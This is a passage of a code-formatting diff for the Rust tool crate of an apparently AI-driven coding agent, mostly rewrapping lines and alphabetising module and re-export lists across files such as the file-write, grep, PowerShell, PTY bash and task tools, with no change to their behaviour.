         let lines: Vec<&str> = content.lines().collect();

--- a/src-rust/crates/tools/src/file_write.rs
+++ b/src-rust/crates/tools/src/file_write.rs
@@ -57,11 +57,9 @@ impl Tool for FileWriteTool {
         debug!(path = %path.display(), "Writing file");
 
         // Permission check
-        if let Err(e) = ctx.check_permission(
-            self.name(),
-            &format!("Write {}", path.display()),
-            false,
-        ) {
+        if let Err(e) =
+            ctx.check_permission(self.name(), &format!("Write {}", path.display()), false)
+        {
             return ToolResult::error(e.to_string());
         }
 
@@ -97,11 +95,7 @@ impl Tool for FileWriteTool {
 
         // Write the file
         if let Err(e) = tokio::fs::write(&path, &params.content).await {
-            return ToolResult::error(format!(
-                "Failed to write file {}: {}",
-                path.display(),
-                e
-            ));
+            return ToolResult::error(format!("Failed to write file {}: {}", path.display(), e));
         }
 
         ctx.record_file_change(

--- a/src-rust/crates/tools/src/formatter.rs
+++ b/src-rust/crates/tools/src/formatter.rs
@@ -41,11 +41,7 @@ pub async fn try_format_file(path: &str, ctx: &ToolContext) {
         }
 
         // Run with a 30-second timeout; silently ignore all errors.
-        let _ = tokio::time::timeout(
-            std::time::Duration::from_secs(30),
-            cmd.output(),
-        )
-        .await;
+        let _ = tokio::time::timeout(std::time::Duration::from_secs(30), cmd.output()).await;
 
         // Only apply the first matching formatter.
         break;

--- a/src-rust/crates/tools/src/glob_tool.rs
+++ b/src-rust/crates/tools/src/glob_tool.rs
@@ -65,10 +65,7 @@ impl Tool for GlobTool {
         debug!(pattern = %params.pattern, dir = %base_dir.display(), "Running glob");
 
         if !base_dir.exists() || !base_dir.is_dir() {
-            return ToolResult::error(format!(
-                "Directory not found: {}",
-                base_dir.display()
-            ));
+            return ToolResult::error(format!("Directory not found: {}", base_dir.display()));
         }
 
         // Build the full glob pattern

--- a/src-rust/crates/tools/src/grep_tool.rs
+++ b/src-rust/crates/tools/src/grep_tool.rs
@@ -212,10 +212,7 @@ impl Tool for GrepTool {
 
             // Type filter
             if !type_exts.is_empty() {
-                let ext = path
-                    .extension()
-                    .and_then(|e| e.to_str())
-                    .unwrap_or("");
+                let ext = path.extension().and_then(|e| e.to_str()).unwrap_or("");
                 if !type_exts.contains(&ext) {
                     continue;
                 }
@@ -315,7 +312,9 @@ impl GrepTool {
     ) -> ToolResult {
         let content = match std::fs::read_to_string(path) {
             Ok(c) => c,
-            Err(e) => return ToolResult::error(format!("Failed to read {}: {}", path.display(), e)),
+            Err(e) => {
+                return ToolResult::error(format!("Failed to read {}: {}", path.display(), e))
+            }
         };
 
         let lines: Vec<&str> = content.lines().collect();
@@ -328,19 +327,12 @@ impl GrepTool {
         }
 
         if matching_lines.is_empty() {
-            return ToolResult::success(format!(
-                "No matches found in {}",
-                path.display()
-            ));
+            return ToolResult::success(format!("No matches found in {}", path.display()));
         }
 
         match output_mode {
             "files_with_matches" => ToolResult::success(path.display().to_string()),
-            "count" => ToolResult::success(format!(
-                "{}:{}",
-                path.display(),
-                matching_lines.len()
-            )),
+            "count" => ToolResult::success(format!("{}:{}", path.display(), matching_lines.len())),
             _ => {
                 let mut results = Vec::new();
                 for line_idx in &matching_lines {

--- a/src-rust/crates/tools/src/lib.rs
+++ b/src-rust/crates/tools/src/lib.rs
@@ -15,79 +15,82 @@ use std::sync::atomic::{AtomicUsize, Ordering};
 use std::sync::Arc;
 
 // Sub-modules – each contains a full tool implementation.
+pub mod apply_patch;
 pub mod ask_user;
 pub mod bash;
-pub mod pty_bash;
+pub mod batch_edit;
 pub mod brief;
+pub mod bundled_skills;
+pub mod computer_use;
 pub mod config_tool;
 pub mod cron;
 pub mod enter_plan_mode;
 pub mod exit_plan_mode;
-pub mod apply_patch;
-pub mod batch_edit;
 pub mod file_edit;
 pub mod file_read;
 pub mod file_write;
+pub mod formatter;
 pub mod glob_tool;
 pub mod grep_tool;
 pub mod lsp_tool;
+pub mod mcp_auth_tool;
 pub mod mcp_resources;
-pub mod todo_write;
 pub mod notebook_edit;
 pub mod powershell;
+pub mod pty_bash;
+pub mod remote_trigger;
+pub mod repl_tool;
 pub mod send_message;
-pub mod bundled_skills;
 pub mod skill_tool;
 pub mod sleep;
+pub mod synthetic_output;
 pub mod tasks;
+pub mod team_tool;
+pub mod todo_write;
 pub mod tool_search;
 pub mod web_fetch;
 pub mod web_search;
 pub mod worktree;
-pub mod computer_use;
-pub mod mcp_auth_tool;
-pub mod repl_tool;
-pub mod synthetic_output;
-pub mod team_tool;
-pub mod remote_trigger;
-pub mod formatter;
 
 // Re-exports for convenience.
-pub use formatter::try_format_file;
+pub use apply_patch::ApplyPatchTool;
 pub use ask_user::AskUserQuestionTool;
 pub use bash::BashTool;
-pub use pty_bash::PtyBashTool;
+pub use batch_edit::BatchEditTool;
 pub use brief::BriefTool;
+pub use computer_use::ComputerUseTool;
 pub use config_tool::ConfigTool;
 pub use cron::{CronCreateTool, CronDeleteTool, CronListTool};
 pub use enter_plan_mode::EnterPlanModeTool;
 pub use exit_plan_mode::ExitPlanModeTool;
-pub use apply_patch::ApplyPatchTool;
-pub use batch_edit::BatchEditTool;
 pub use file_edit::FileEditTool;
 pub use file_read::FileReadTool;
 pub use file_write::FileWriteTool;
+pub use formatter::try_format_file;
 pub use glob_tool::GlobTool;
 pub use grep_tool::GrepTool;
 pub use lsp_tool::LspTool;
+pub use mcp_auth_tool::McpAuthTool;
 pub use mcp_resources::{ListMcpResourcesTool, ReadMcpResourceTool};
-pub use todo_write::TodoWriteTool;
 pub use notebook_edit::NotebookEditTool;
 pub use powershell::PowerShellTool;
-pub use send_message::{SendMessageTool, drain_inbox, peek_inbox};
+pub use pty_bash::PtyBashTool;
+pub use remote_trigger::RemoteTriggerTool;
+pub use repl_tool::ReplTool;
+pub use send_message::{drain_inbox, peek_inbox, SendMessageTool};
 pub use skill_tool::SkillTool;
 pub use sleep::SleepTool;
-pub use tasks::{TaskCreateTool, TaskGetTool, TaskListTool, TaskOutputTool, TaskStopTool, TaskUpdateTool, Task, TaskStatus, TASK_STORE};
+pub use synthetic_output::SyntheticOutputTool;
+pub use tasks::{
+    Task, TaskCreateTool, TaskGetTool, TaskListTool, TaskOutputTool, TaskStatus, TaskStopTool,
+    TaskUpdateTool, TASK_STORE,
+};
+pub use team_tool::{register_agent_runner, AgentRunFn, TeamCreateTool, TeamDeleteTool};
+pub use todo_write::TodoWriteTool;
 pub use tool_search::ToolSearchTool;
 pub use web_fetch::WebFetchTool;
 pub use web_search::WebSearchTool;
 pub use worktree::{EnterWorktreeTool, ExitWorktreeTool};
-pub use computer_use::ComputerUseTool;
-pub use mcp_auth_tool::McpAuthTool;
-pub use repl_tool::ReplTool;
-pub use synthetic_output::SyntheticOutputTool;
-pub use team_tool::{TeamCreateTool, TeamDeleteTool, register_agent_runner, AgentRunFn};
-pub use remote_trigger::RemoteTriggerTool;
 
 // ---------------------------------------------------------------------------
 // Core trait & types
@@ -170,13 +173,15 @@ impl ShellState {
 /// Process-global registry of shell states keyed by session_id.
 /// This lets us persist cwd/env across Bash invocations without changing
 /// the `ToolContext` struct (which is constructed in places we cannot modify).
-static SHELL_STATE_REGISTRY: once_cell::sync::Lazy<dashmap::DashMap<String, Arc<parking_lot::Mutex<ShellState>>>> =
-    once_cell::sync::Lazy::new(dashmap::DashMap::new);
+static SHELL_STATE_REGISTRY: once_cell::sync::Lazy<
+    dashmap::DashMap<String, Arc<parking_lot::Mutex<ShellState>>>,
+> = once_cell::sync::Lazy::new(dashmap::DashMap::new);
 
 /// Process-global registry of `SnapshotManager` instances keyed by session_id.
 /// Used by tools to record pre-write snapshots and by `/undo` to revert them.
-static SNAPSHOT_REGISTRY: once_cell::sync::Lazy<dashmap::DashMap<String, Arc<parking_lot::Mutex<claurst_core::SnapshotManager>>>> =
-    once_cell::sync::Lazy::new(dashmap::DashMap::new);
+static SNAPSHOT_REGISTRY: once_cell::sync::Lazy<
+    dashmap::DashMap<String, Arc<parking_lot::Mutex<claurst_core::SnapshotManager>>>,
+> = once_cell::sync::Lazy::new(dashmap::DashMap::new);
 
 /// Return the persistent `ShellState` for the given session, creating one if needed.
 pub fn session_shell_state(session_id: &str) -> Arc<parking_lot::Mutex<ShellState>> {
@@ -192,7 +197,9 @@ pub fn clear_session_shell_state(session_id: &str) {
 }
 
 /// Return the persistent `SnapshotManager` for the given session, creating one if needed.
-pub fn session_snapshot(session_id: &str) -> Arc<parking_lot::Mutex<claurst_core::SnapshotManager>> {
+pub fn session_snapshot(
+    session_id: &str,
+) -> Arc<parking_lot::Mutex<claurst_core::SnapshotManager>> {
     SNAPSHOT_REGISTRY
         .entry(session_id.to_string())
         .or_insert_with(|| Arc::new(parking_lot::Mutex::new(claurst_core::SnapshotManager::new())))
@@ -404,7 +411,10 @@ mod tests {
     #[test]
     fn test_all_tools_non_empty() {
         let tools = all_tools();
-        assert!(!tools.is_empty(), "all_tools() must return at least one tool");
+        assert!(
+            !tools.is_empty(),
+            "all_tools() must return at least one tool"
+        );
     }
 
     #[test]
@@ -470,9 +480,16 @@ mod tests {
     #[test]
     fn test_core_tools_present() {
         let expected = [
-            "Bash", "Read", "Edit", "Write", "Glob", "Grep",
-            "WebFetch", "WebSearch",
-            "TodoWrite", "Skill",
+            "Bash",
+            "Read",
+            "Edit",
+            "Write",
+            "Glob",
+            "Grep",
+            "WebFetch",
+            "WebSearch",
+            "TodoWrite",
+            "Skill",
         ];
         for name in &expected {
             assert!(

--- a/src-rust/crates/tools/src/lsp_tool.rs
+++ b/src-rust/crates/tools/src/lsp_tool.rs
@@ -74,14 +74,8 @@ impl Tool for LspTool {
         };
 
         // line/column only required for position-based actions
-        let line = input
-            .get("line")
-            .and_then(|v| v.as_u64())
-            .unwrap_or(1) as u32;
-        let column = input
-            .get("column")
-            .and_then(|v| v.as_u64())
-            .unwrap_or(1) as u32;
+        let line = input.get("line").and_then(|v| v.as_u64()).unwrap_or(1) as u32;
+        let column = input.get("column").and_then(|v| v.as_u64()).unwrap_or(1) as u32;
 
         // --- Seed the global LSP manager with configs from current session ---
         let lsp_manager_arc = claurst_core::lsp::global_lsp_manager();

--- a/src-rust/crates/tools/src/mcp_resources.rs
+++ b/src-rust/crates/tools/src/mcp_resources.rs
@@ -25,7 +25,9 @@ struct ListMcpResourcesInput {
 
 #[async_trait]
 impl Tool for ListMcpResourcesTool {
-    fn name(&self) -> &str { "ListMcpResources" }
+    fn name(&self) -> &str {
+        "ListMcpResources"
+    }
 
     fn description(&self) -> &str {
         "List all resources available from connected MCP servers. \
@@ -33,7 +35,9 @@ impl Tool for ListMcpResourcesTool {
          Resources represent data that MCP servers expose (files, database records, etc.)."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::ReadOnly }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::ReadOnly
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -91,14 +95,18 @@ struct ReadMcpResourceInput {
 
 #[async_trait]
 impl Tool for ReadMcpResourceTool {
-    fn name(&self) -> &str { "ReadMcpResource" }
+    fn name(&self) -> &str {
+        "ReadMcpResource"
+    }
 
     fn description(&self) -> &str {
         "Read a specific resource from an MCP server by URI. \
          Use ListMcpResources to discover available resource URIs."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::ReadOnly }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::ReadOnly
+    }
 
     fn input_schema(&self) -> Value {
         json!({

--- a/src-rust/crates/tools/src/notebook_edit.rs
+++ b/src-rust/crates/tools/src/notebook_edit.rs
@@ -124,25 +124,44 @@ impl Tool for NotebookEditTool {
             "replace" => {
                 let cell_id = match &params.cell_id {
                     Some(id) => id.clone(),
-                    None => return ToolResult::error("cell_id is required for replace mode".to_string()),
+                    None => {
+                        return ToolResult::error(
+                            "cell_id is required for replace mode".to_string(),
+                        )
+                    }
                 };
                 let new_source = match &params.new_source {
                     Some(s) => s.clone(),
-                    None => return ToolResult::error("new_source is required for replace mode".to_string()),
+                    None => {
+                        return ToolResult::error(
+                            "new_source is required for replace mode".to_string(),
+                        )
+                    }
                 };
                 replace_cell(&mut notebook, &cell_id, &new_source)
             }
             "insert" => {
                 let new_source = match &params.new_source {
                     Some(s) => s.clone(),
-                    None => return ToolResult::error("new_source is required for insert mode".to_string()),
+                    None => {
+                        return ToolResult::error(
+                            "new_source is required for insert mode".to_string(),
+                        )
+                    }
                 };
-                insert_cell(&mut notebook, params.cell_id.as_deref(), &new_source, &params.cell_type)
+                insert_cell(
+                    &mut notebook,
+                    params.cell_id.as_deref(),
+                    &new_source,
+                    &params.cell_type,
+                )
             }
             "delete" => {
                 let cell_id = match &params.cell_id {
                     Some(id) => id.clone(),
-                    None => return ToolResult::error("cell_id is required for delete mode".to_string()),
+                    None => {
+                        return ToolResult::error("cell_id is required for delete mode".to_string())
+                    }
                 };
                 delete_cell(&mut notebook, &cell_id)
             }
@@ -154,7 +173,9 @@ impl Tool for NotebookEditTool {
                 // Write back
                 let updated = match serde_json::to_string_pretty(&notebook) {
                     Ok(s) => s,
-                    Err(e) => return ToolResult::error(format!("Failed to serialize notebook: {}", e)),
+                    Err(e) => {
+                        return ToolResult::error(format!("Failed to serialize notebook: {}", e))
+                    }
                 };
                 if let Err(e) = tokio::fs::write(&path, &updated).await {
                     return ToolResult::error(format!("Failed to write notebook: {}", e));
@@ -190,7 +211,11 @@ fn find_cell_index(cells: &[Value], cell_id: &str) -> Result<usize, String> {
         if idx < cells.len() {
             return Ok(idx);
         }
-        return Err(format!("Cell index {} is out of range (notebook has {} cells)", idx, cells.len()));
+        return Err(format!(
+            "Cell index {} is out of range (notebook has {} cells)",
+            idx,
+            cells.len()
+        ));
     }
 
     // Try UUID match
@@ -288,7 +313,10 @@ fn insert_cell(
     let cell = make_cell(cell_type, new_source, &new_id);
 
     cells.insert(insert_at, cell);
-    Ok(format!("Inserted {} cell '{}' at position {}", cell_type, new_id, insert_at))
+    Ok(format!(
+        "Inserted {} cell '{}' at position {}",
+        cell_type, new_id, insert_at
+    ))
 }
 
 fn delete_cell(notebook: &mut Value, cell_id: &str) -> Result<String, String> {

--- a/src-rust/crates/tools/src/powershell.rs
+++ b/src-rust/crates/tools/src/powershell.rs
@@ -15,7 +15,7 @@
 
 use crate::{PermissionLevel, Tool, ToolContext, ToolResult};
 use async_trait::async_trait;
-use claurst_core::ps_classifier::{PsRiskLevel, classify_ps_command};
+use claurst_core::ps_classifier::{classify_ps_command, PsRiskLevel};
 use serde::Deserialize;
 use serde_json::{json, Value};
 use std::process::Stdio;
@@ -38,7 +38,9 @@ struct PowerShellInput {
     require_confirmation: bool,
 }
 
-fn default_timeout() -> u64 { 120_000 }
+fn default_timeout() -> u64 {
+    120_000
+}
 
 // ---------------------------------------------------------------------------
 // Risk-label helpers (used in messages shown to the user)
@@ -47,9 +49,9 @@ fn default_timeout() -> u64 { 120_000 }
 fn risk_label(level: PsRiskLevel) -> &'static str {
     match level {
         PsRiskLevel::Critical => "Critical",
-        PsRiskLevel::High     => "High",
-        PsRiskLevel::Medium   => "Medium",
-        PsRiskLevel::Low      => "Low",
+        PsRiskLevel::High => "High",
+        PsRiskLevel::Medium => "Medium",
+        PsRiskLevel::Low => "Low",
     }
 }
 
@@ -82,14 +84,18 @@ fn risk_explanation(level: PsRiskLevel, command: &str) -> String {
 
 #[async_trait]
 impl Tool for PowerShellTool {
-    fn name(&self) -> &str { "PowerShell" }
+    fn name(&self) -> &str {
+        "PowerShell"
+    }
 
     fn description(&self) -> &str {
         "Execute a PowerShell command. Use for Windows-native operations, .NET APIs, \
          registry access, and Windows-specific system administration."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::Execute }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::Execute
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -142,7 +148,9 @@ impl Tool for PowerShellTool {
                     params.description.as_deref().unwrap_or(&params.command)
                 );
                 let details = risk_explanation(PsRiskLevel::High, &params.command);
-                if let Err(e) = ctx.check_permission_with_details(self.name(), &desc, &details, false) {
+                if let Err(e) =
+                    ctx.check_permission_with_details(self.name(), &desc, &details, false)
+                {
                     return ToolResult::error(e.to_string());
                 }
             }
@@ -164,7 +172,9 @@ impl Tool for PowerShellTool {
                         params.description.as_deref().unwrap_or(&params.command)
                     );
                     let details = risk_explanation(PsRiskLevel::Medium, &params.command);
-                    if let Err(e) = ctx.check_permission_with_details(self.name(), &desc, &details, false) {
+                    if let Err(e) =
+                        ctx.check_permission_with_details(self.name(), &desc, &details, false)
+                    {
                         return ToolResult::error(e.to_string());
                     }
                 }
@@ -182,7 +192,10 @@ impl Tool for PowerShellTool {
 
         // ── Step 3: execute ──────────────────────────────────────────────────
         let (exe, args) = if cfg!(windows) {
-            ("powershell", vec!["-NoProfile", "-NonInteractive", "-Command"])
+            (
+                "powershell",
+                vec!["-NoProfile", "-NonInteractive", "-Command"],
+            )
         } else {
             ("pwsh", vec!["-NoProfile", "-NonInteractive", "-Command"])
         };
@@ -231,18 +244,23 @@ impl Tool for PowerShellTool {
 
             let status = child.wait().await;
             (stdout_lines, stderr_lines, status)
-        }).await;
+        })
+        .await;
 
         match result {
             Ok((stdout_lines, stderr_lines, status)) => {
                 let exit_code = status.map(|s| s.code().unwrap_or(-1)).unwrap_or(-1);
                 let mut output = stdout_lines.join("\n");
                 if !stderr_lines.is_empty() {
-                    if !output.is_empty() { output.push('\n'); }
+                    if !output.is_empty() {
+                        output.push('\n');
+                    }
                     output.push_str("STDERR:\n");
                     output.push_str(&stderr_lines.join("\n"));
                 }
-                if output.is_empty() { output = "(no output)".to_string(); }
+                if output.is_empty() {
+                    output = "(no output)".to_string();
+                }
 
                 // Truncate very long output (same limit as BashTool)
                 const MAX_OUTPUT_LEN: usize = 100_000;
@@ -259,14 +277,20 @@ impl Tool for PowerShellTool {
                 }
 
                 if exit_code != 0 {
-                    ToolResult::error(format!("PowerShell exited with code {}\n{}", exit_code, output))
+                    ToolResult::error(format!(
+                        "PowerShell exited with code {}\n{}",
+                        exit_code, output
+                    ))
                 } else {
                     ToolResult::success(output)
                 }
             }
             Err(_) => {
                 let _ = child.kill().await;
-                ToolResult::error(format!("PowerShell command timed out after {}ms", timeout_ms))
+                ToolResult::error(format!(
+                    "PowerShell command timed out after {}ms",
+                    timeout_ms
+                ))
             }
         }
     }

--- a/src-rust/crates/tools/src/pty_bash.rs
+++ b/src-rust/crates/tools/src/pty_bash.rs
@@ -10,10 +10,10 @@
 //  Windows → falls back to the existing cmd.exe approach; ConPTY is available
 //             in portable_pty but adds complexity for minimal gain on Windows.
 
-use crate::{PermissionLevel, Tool, ToolContext, ToolResult, session_shell_state};
+use crate::{session_shell_state, PermissionLevel, Tool, ToolContext, ToolResult};
 use async_trait::async_trait;
-use claurst_core::bash_classifier::{BashRiskLevel, classify_bash_command};
-use claurst_core::tasks::{BackgroundTask, global_registry};
+use claurst_core::bash_classifier::{classify_bash_command, BashRiskLevel};
+use claurst_core::tasks::{global_registry, BackgroundTask};
 use serde::Deserialize;
 use serde_json::{json, Value};
 use std::path::PathBuf;
@@ -72,8 +72,15 @@ fn parse_shell_state_block(lines: &[String]) -> Option<(PathBuf, HashMap<String,
             let key = line[..eq].to_string();
             let val = line[eq + 1..].to_string();
             if !key.starts_with('_')
-                && !["SHLVL", "BASH_LINENO", "BASH_SOURCE", "FUNCNAME", "PIPESTATUS", "OLDPWD"]
-                    .contains(&key.as_str())
+                && ![
+                    "SHLVL",
+                    "BASH_LINENO",
+                    "BASH_SOURCE",
+                    "FUNCNAME",
+                    "PIPESTATUS",
+                    "OLDPWD",
+                ]
+                .contains(&key.as_str())
             {
                 env_vars.insert(key, val);
             }
@@ -85,10 +92,9 @@ fn parse_shell_state_block(lines: &[String]) -> Option<(PathBuf, HashMap<String,
 
 #[cfg(unix)]
 fn extract_exports_from_command(command: &str) -> HashMap<String, String> {
-    let re = Regex::new(
-        r#"(?m)^\s*export\s+([A-Za-z_][A-Za-z0-9_]*)=(?:"([^"]*)"|'([^']*)'|(\S*))"#,
-    )
-    .unwrap();
+    let re =
+        Regex::new(r#"(?m)^\s*export\s+([A-Za-z_][A-Za-z0-9_]*)=(?:"([^"]*)"|'([^']*)'|(\S*))"#)
+            .unwrap();
     let mut map = HashMap::new();
     for cap in re.captures_iter(command) {
         let key = cap[1].to_string();
@@ -252,7 +258,7 @@ fn strip_ansi(s: &str) -> String {
             match chars.peek() {
                 Some('[') => {
                     chars.next(); // consume '['
-                    // CSI: consume parameter + intermediate bytes, stop at final byte
+                                  // CSI: consume parameter + intermediate bytes, stop at final byte
                     for c in &mut chars {
                         if c.is_ascii_alphabetic() || c == '@' {
                             break;
@@ -302,7 +308,7 @@ async fn run_in_pty(
     working_dir: &str,
     timeout: Duration,
 ) -> Result<(String, i32), String> {
-    use portable_pty::{CommandBuilder, PtySize, native_pty_system};
+    use portable_pty::{native_pty_system, CommandBuilder, PtySize};
     use std::io::Read;
 
     let pty_system = native_pty_system();
@@ -469,7 +475,10 @@ fn truncate_output(mut output: String, exit_code: i32) -> ToolResult {
     }
 
     if exit_code != 0 {
-        ToolResult::error(format!("Command exited with code {}\n{}", exit_code, output))
+        ToolResult::error(format!(
+            "Command exited with code {}\n{}",
+            exit_code, output
+        ))
     } else {
         ToolResult::success(output)
     }
@@ -580,9 +589,11 @@ impl Tool for PtyBashTool {
                 (script, wd)
             };
 
-            let result =
-                tokio::time::timeout(timeout_dur, run_in_pty(&script, &working_dir_str, timeout_dur))
-                    .await;
+            let result = tokio::time::timeout(
+                timeout_dur,
+                run_in_pty(&script, &working_dir_str, timeout_dur),
+            )
+            .await;
 
             match result {
                 Ok(Ok((raw_output, exit_code))) => {
@@ -590,8 +601,7 @@ impl Tool for PtyBashTool {
                     let cleaned = strip_ansi(&raw_output);
 
                     // Split into user-visible lines and state block
-                    let all_lines: Vec<String> =
-                        cleaned.lines().map(|l| l.to_string()).collect();
+                    let all_lines: Vec<String> = cleaned.lines().map(|l| l.to_string()).collect();
 
                     let sentinel_pos = all_lines
                         .iter()

--- a/src-rust/crates/tools/src/remote_trigger.rs
+++ b/src-rust/crates/tools/src/remote_trigger.rs
@@ -1,10 +1,10 @@
 //! RemoteTriggerTool — cross-session event dispatch.
 //! Mirrors src/tools/RemoteTriggerTool/.
 
+use crate::{PermissionLevel, Tool, ToolContext, ToolResult};
 use async_trait::async_trait;
 use serde::Deserialize;
 use serde_json::{json, Value};
-use crate::{PermissionLevel, Tool, ToolContext, ToolResult};
 
 /// Input schema for RemoteTriggerTool.
 #[derive(Debug, Deserialize)]

--- a/src-rust/crates/tools/src/repl_tool.rs
+++ b/src-rust/crates/tools/src/repl_tool.rs
@@ -99,8 +99,8 @@ async fn get_or_spawn_session(
     }
 
     // Spawn a new interpreter
-    let (cmd, args) = interpreter_for(language)
-        .ok_or_else(|| format!("Unsupported language: {}", language))?;
+    let (cmd, args) =
+        interpreter_for(language).ok_or_else(|| format!("Unsupported language: {}", language))?;
 
     let mut child = tokio::process::Command::new(cmd)
         .args(&args)
@@ -232,11 +232,7 @@ impl Tool for ReplTool {
             Err(e) => return ToolResult::error(format!("Invalid input: {}", e)),
         };
 
-        let language = params
-            .language
-            .as_deref()
-            .unwrap_or("bash")
-            .to_lowercase();
+        let language = params.language.as_deref().unwrap_or("bash").to_lowercase();
 
         debug!(
             session = %ctx.session_id,

--- a/src-rust/crates/tools/src/send_message.rs
+++ b/src-rust/crates/tools/src/send_message.rs
@@ -59,7 +59,9 @@ struct SendMessageInput {
 
 #[async_trait]
 impl Tool for SendMessageTool {
-    fn name(&self) -> &str { "SendMessage" }
+    fn name(&self) -> &str {
+        "SendMessage"
+    }
 
     fn description(&self) -> &str {
         "Send a message to another agent by name, or broadcast to all active agents with to=\"*\". \
@@ -67,7 +69,9 @@ impl Tool for SendMessageTool {
          Use this for coordination between concurrent sub-agents."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -112,13 +116,10 @@ impl Tool for SendMessageTool {
             timestamp: now,
         };
 
-        let preview = params
-            .summary
-            .as_deref()
-            .unwrap_or_else(|| {
-                let s = params.message.as_str();
-                &s[..s.len().min(60)]
-            });
+        let preview = params.summary.as_deref().unwrap_or_else(|| {
+            let s = params.message.as_str();
+            &s[..s.len().min(60)]
+        });
 
         if params.to == "*" {
             // Broadcast: deliver to every existing inbox key

--- a/src-rust/crates/tools/src/skill_tool.rs
+++ b/src-rust/crates/tools/src/skill_tool.rs
@@ -30,7 +30,9 @@ struct SkillInput {
 
 #[async_trait]
 impl Tool for SkillTool {
-    fn name(&self) -> &str { "Skill" }
+    fn name(&self) -> &str {
+        "Skill"
+    }
 
     fn description(&self) -> &str {
         "Execute a skill (custom prompt template) by name. \
@@ -39,7 +41,9 @@ impl Tool for SkillTool {
          The expanded skill prompt is returned for you to act on."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::ReadOnly }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::ReadOnly
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -121,9 +125,7 @@ impl Tool for SkillTool {
 // ---------------------------------------------------------------------------
 
 fn skill_search_dirs(ctx: &ToolContext) -> Vec<PathBuf> {
-    let mut dirs = vec![
-        ctx.working_dir.join(".claurst").join("commands"),
-    ];
+    let mut dirs = vec![ctx.working_dir.join(".claurst").join("commands")];
     if let Some(home) = dirs::home_dir() {
         dirs.push(home.join(".claurst").join("commands"));
     }

--- a/src-rust/crates/tools/src/sleep.rs
+++ b/src-rust/crates/tools/src/sleep.rs
@@ -22,7 +22,9 @@ struct SleepInput {
 
 #[async_trait]
 impl Tool for SleepTool {
-    fn name(&self) -> &str { "Sleep" }
+    fn name(&self) -> &str {
+        "Sleep"
+    }
 
     fn description(&self) -> &str {
         "Wait for a specified duration in milliseconds. \
@@ -31,7 +33,9 @@ impl Tool for SleepTool {
          The user can interrupt the sleep at any time."
     }
 
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({

--- a/src-rust/crates/tools/src/tasks.rs
+++ b/src-rust/crates/tools/src/tasks.rs
@@ -109,8 +109,7 @@ impl Task {
 
 /// Global task store shared across all tool invocations.
 /// Public so the TUI can access and display tasks.
-pub static TASK_STORE: Lazy<Arc<DashMap<String, Task>>> =
-    Lazy::new(|| Arc::new(DashMap::new()));
+pub static TASK_STORE: Lazy<Arc<DashMap<String, Task>>> = Lazy::new(|| Arc::new(DashMap::new()));
 
 // ---------------------------------------------------------------------------
 // TaskCreate
@@ -128,9 +127,15 @@ struct TaskCreateInput {
 
 #[async_trait]
 impl Tool for TaskCreateTool {
-    fn name(&self) -> &str { claurst_core::constants::TOOL_NAME_TASK_CREATE }
-    fn description(&self) -> &str { "Create a new task to track work items. Returns the task ID." }
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn name(&self) -> &str {
+        claurst_core::constants::TOOL_NAME_TASK_CREATE
+    }
+    fn description(&self) -> &str {
+        "Create a new task to track work items. Returns the task ID."
+    }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -157,10 +162,13 @@ impl Tool for TaskCreateTool {
         debug!(task_id = %task_id, subject = %params.subject, "Creating task");
         TASK_STORE.insert(task_id.clone(), task);
 
-        ToolResult::success(serde_json::to_string_pretty(&json!({
-            "task_id": task_id,
-            "subject": params.subject,
-        })).unwrap_or_default())
+        ToolResult::success(
+            serde_json::to_string_pretty(&json!({
+                "task_id": task_id,
+                "subject": params.subject,
+            }))
+            .unwrap_or_default(),
+        )
     }
 }
 
@@ -178,9 +186,15 @@ struct TaskGetInput {
 
 #[async_trait]
 impl Tool for TaskGetTool {
-    fn name(&self) -> &str { claurst_core::constants::TOOL_NAME_TASK_GET }
-    fn description(&self) -> &str { "Get full details of a task by ID." }
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn name(&self) -> &str {
+        claurst_core::constants::TOOL_NAME_TASK_GET
+    }
+    fn description(&self) -> &str {
+        "Get full details of a task by ID."
+    }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -200,11 +214,11 @@ impl Tool for TaskGetTool {
 
         match TASK_STORE.get(&params.task_id) {
             Some(task) => ToolResult::success(
-                serde_json::to_string_pretty(&task.to_full_value()).unwrap_or_default()
+                serde_json::to_string_pretty(&task.to_full_value()).unwrap_or_default(),
             ),
-            None => ToolResult::success(
-                serde_json::to_string_pretty(&json!(null)).unwrap_or_default()
-            ),
+            None => {
+                ToolResult::success(serde_json::to_string_pretty(&json!(null)).unwrap_or_default())
+            }
         }
     }
 }
@@ -239,9 +253,15 @@ struct TaskUpdateInput {
 
 #[async_trait]
 impl Tool for TaskUpdateTool {
-    fn name(&self) -> &str { claurst_core::constants::TOOL_NAME_TASK_UPDATE }
-    fn description(&self) -> &str { "Update a task's properties (status, subject, description, etc.)." }
-    fn permission_level(&self) -> PermissionLevel { PermissionLevel::None }
+    fn name(&self) -> &str {
+        claurst_core::constants::TOOL_NAME_TASK_UPDATE
+    }
+    fn description(&self) -> &str {
+        "Update a task's properties (status, subject, description, etc.)."
+    }
+    fn permission_level(&self) -> PermissionLevel {
+        PermissionLevel::None
+    }
 
     fn input_schema(&self) -> Value {
         json!({
@@ -337,11 +357,14 @@ impl Tool for TaskUpdateTool {
             TASK_STORE.remove(&task_id);
         }
 
